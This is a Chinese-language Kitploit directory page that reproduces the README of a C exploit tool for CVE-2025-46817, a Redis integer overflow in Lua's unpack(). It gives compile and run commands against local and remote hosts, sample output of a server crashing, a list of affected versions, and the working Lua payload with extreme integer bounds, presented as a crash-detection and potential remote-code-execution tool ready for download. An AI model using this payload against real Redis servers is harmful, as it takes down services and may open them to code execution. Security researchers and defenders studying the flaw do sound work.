Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
漏洞分析漏洞利用模糊测试渗透测试数据库安全
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

基于 C 的 CVE-2025-46817 漏洞利用程序,该漏洞为 Redis 整数溢出漏洞,可实现崩溃检测,并可通过 Lua unpack() 载荷实现潜在远程代码执行(RCE)。

查看仓库
210个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-46817 Redis 整数溢出漏洞利用工具

Banner Language Platform

一个针对 Redis 整数溢出漏洞 CVE-2025-46817 的轻量级 C 语言利用工具。

🚀 功能特性

  • 轻量级:单一 C 文件,除 hiredis 外无外部依赖
  • 高性能:原生编译,性能最大化
  • 彩色输出:美观的终端颜色和图标
  • 崩溃检测:自动检测服务器崩溃
  • 版本检查:识别存在漏洞的 Redis 版本
  • 超时支持:可配置连接超时时间

📋 环境要求

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 编译方法

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 使用方法

基本用法

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

远程目标

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

命令行选项

root@kitploit:~
-H <host>    Redis 服务器主机(必填)
-P <port>    Redis 服务器端口(必填)  
-t <timeout> 连接超时时间(秒,默认:10)
-h           显示帮助信息

📊 输出示例

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    CVE-2025-46817 漏洞利用工具
                   整数溢出 -> RCE 利用链
                   访问 -> https://pwnbuffer.org/

    作者:Slayerkkk
    目标:Redis <= 8.2.1
    类型:内存破坏 -> 代码执行

ℹ️ 正在测试连接 127.0.0.1:6379...
✅ 连接成功
ℹ️ Redis 版本:8.2.1
❌ 存在漏洞 - 版本 <= 8.2.1
ℹ️ 正在测试 Lua 脚本...
✅ Lua 已启用(1+1=2)

🚀 开始利用
==================================================
💀 正在执行利用载荷...
    载荷:通过 unpack() 实现整数溢出
💥 服务器已崩溃 - 连接丢失!

📊 利用结果
==============================
  💥 状态:已崩溃(2.34秒)

💀 利用成功 - 服务器已崩溃!
   已确认 CVE-2025-46817 漏洞

🛡️ 受影响版本

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 技术细节

漏洞原理

该漏洞针对 Redis 的 Lua unpack() 函数实现(luaB_unpack)中的整数溢出。当使用特定参数调用时,有符号整数运算会发生溢出,导致 Redis 尝试物化大量返回值。

利用载荷

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

影响范围

  • 服务器崩溃:立即拒绝服务
  • 内存破坏:堆/栈损坏
  • 潜在 RCE:内存破坏可能导致代码执行

🎯 检测结果

该工具会报告以下状态之一:

  • ✅ survived:服务器处理了载荷(可能已修补)
  • 💥 crashed:服务器已崩溃(存在漏洞)
  • ⚠️ timeout:服务器挂起(可能存在漏洞)
  • ❌ error:发生其他错误

🙏 致谢

作者:Slayerkkk
网站:https://pwnbuffer.org

下载工具